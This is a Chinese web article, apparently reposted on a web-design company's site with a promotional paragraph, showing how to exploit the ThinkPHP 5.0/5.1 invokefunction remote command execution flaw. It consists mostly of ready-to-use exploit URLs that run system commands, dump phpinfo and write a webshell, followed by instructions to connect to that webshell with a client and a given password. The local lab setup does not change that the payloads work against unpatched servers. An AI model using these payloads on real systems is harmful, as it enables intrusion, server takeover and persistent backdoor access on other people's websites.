下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!
霞浦网站制作公司哪家好,找
创新互联!从网页设计、网站建设、微信开发、APP开发、响应式网站建设等网站项目制作,到程序开发,运营维护。
创新互联于2013年成立到现在10年的时间,我们拥有了丰富的建站经验和运维经验,来保证我们的工作的顺利进行。专注于网站建设就选
创新互联。
thinkphp_5x_命令执行漏洞
受影响版本包括5.0和5.1版本
docker漏洞环境源码:
https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html
利用system函数远程命令执行
EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
通过phpinfo函数写出phpinfo()信息
EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php
或者
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK
使用菜刀连接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
`
网站栏目:关于ThinkPHP漏洞利用
本文路径:http://cdkjz.cn/article/chdjid.html
